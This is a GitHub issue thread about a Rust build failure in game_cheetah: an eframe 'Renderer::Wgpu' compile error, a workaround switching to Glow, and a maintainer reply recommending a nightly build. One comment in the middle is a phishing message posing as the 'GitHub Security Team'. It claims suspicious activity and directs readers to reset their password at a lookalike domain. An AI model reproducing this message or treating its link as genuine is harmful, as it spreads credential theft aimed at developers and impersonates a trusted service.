### ISSUE TITLE
Unable to build

### ISSUE THREAD

**Issue by Enelar** [mkrueger/game_cheetah#20]
I was following the guide but still im getting an compilation error
```
warning: unused import: `about_dialog::*`
  --> src/lib.rs:17:9
   |
17 | pub use about_dialog::*;
   |         ^^^^^^^^^^^^^^^
   |
   = note: `#[warn(unused_imports)]` on by default

warning: `game_cheetah` (lib) generated 1 warning (run `cargo fix --lib -p game_cheetah` to apply 1 suggestion)
error[E0599]: no variant or associated item named `Wgpu` found for enum `Renderer` in the current scope
  --> src/main.rs:29:37
   |
29 |         renderer: eframe::Renderer::Wgpu,
   |                                     ^^^^ variant or associated item not found in `Renderer`

For more information about this error, try `rustc --explain E0599`.
error: could not compile `game_cheetah` (bin "game_cheetah") due to 1 previous error
```

Could you make prepare a snap or something for non deb based distrubutives?

**Comment by m1-s** [comment]
Same for me. Dont like deb so tried to compile myself but got this error. Please provide the binary without .deb.

**Comment by Haelikor** [comment]
I don't know what issues this may cause, I just know it let me build: if you go into src/main.rs and change Wgpu to Glow (there'll be three instances), it should build. Did for me on Opensuse TW. 

Note I did this after running the suggested "cargo fix --lib -p game_cheetah" command.

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

**Comment by mkrueger** [comment]
Updated everything and it builds for me. However you need to use the nightly build.
